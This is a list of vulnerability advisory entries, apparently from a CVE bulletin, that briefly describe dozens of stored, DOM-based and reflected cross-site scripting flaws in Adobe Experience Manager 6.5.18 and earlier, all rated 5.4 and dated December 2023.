adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48521
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48522
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48523
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48524
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48525
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48526
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48527
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48528
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48529
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48530
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48531
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48532
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48533
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48534
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48535
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48536
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48537
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48538
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48539
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48540
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48541
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48542
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48543
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48544
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48545
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48546
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48547
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48548
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48549
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48550
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48551
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48552
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48553
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48554
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48555
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48556
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48557
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48558
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48559
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48560
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48561
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48562
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48563
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48564
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48565
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48566
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48567
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48568
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48569
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48570
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48571
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48572
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48573
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48574
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48575
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48576
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48577
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48578
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48579
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48580
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48581
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48582
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48583
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48584
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48585
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48586
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48587
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48588
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48589
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48590
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48591
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48592
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48593
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48594
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48595
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48596
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48597
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48598
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48599
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48600
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48601
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48602
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48603
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48604
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48605
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48606
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48607
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48609
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48610
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48611
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48612
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48613
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48614
psirt@adobe.com
